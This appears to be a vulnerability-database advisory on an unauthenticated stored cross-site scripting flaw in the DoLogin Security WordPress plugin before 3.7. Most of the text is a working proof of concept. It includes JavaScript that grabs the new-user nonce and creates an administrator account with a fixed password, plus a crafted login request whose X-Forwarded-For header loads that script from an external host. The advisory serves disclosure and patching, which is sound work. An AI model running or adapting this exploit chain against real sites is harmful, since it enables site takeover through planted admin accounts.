WordPress Plugin Vulnerabilities
DoLogin Security < 3.7 - Unauthenticated Stored Cross-Site Scripting
Description
The plugin does not properly sanitize IP addresses coming from the X-Forwarded-For header, which can be used by attackers to conduct Stored XSS attacks via WordPress' login form.
Proof of Concept
1. Put javascript payload on html.cafe. const url = 'https://s…t/wp-admin/user-new.php'; fetch(url) .then(response => response.text()) .then(html => { const parser = new DOMParser(); const doc = parser.parseFromString(html, 'text/html'); const nonceValue = doc.getElementById('_wpnonce_create-user').value; const requestOptions = { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: `action=createuser&_wpnonce_create-user=${encodeURIComponent( nonceValue )}&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=administrator&email=a@a.com&first_name=&last_name=&url=&pass1=O%21k6c5%5EfjO%5E1sF%26%24%21%26V2PG9e&pass2=O%21k6c5%5EfjO%5E1sF%26%24%21%26V2PG9e&send_user_notification=0&role=administrator&ure_other_roles=&createuser=Add+New+User` }; return fetch(url, requestOptions); }); 2. Send HTTP login request with specially crafted X-Forwarded-For header. POST /wp-login.php HTTP/2 Host: <host> Cookie: wordpress_test_cookie=WP%20Cookie%20check Content-Length: 106 Cache-Control: max-age=0 Sec-Ch-Ua: Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "" Upgrade-Insecure-Requests: 1 Origin: https://<host> Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://<host>/wp-login.php Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 X-Forwarded-For: <script src=https://html.cafe/x...3></script> log=XSSor&pwd=abcd&wp-submit=Log+In&redirect_to=https%3A%2F%2F<host>%2Fwp-admin%2F&testcookie=1
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Bartlomiej Marek and Tomasz Swiadek
Submitter
Bartlomiej Marek
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-08-28 (about 8 months ago)
Added
2023-08-30 (about 8 months ago)
Last Updated
2023-08-30 (about 8 months ago)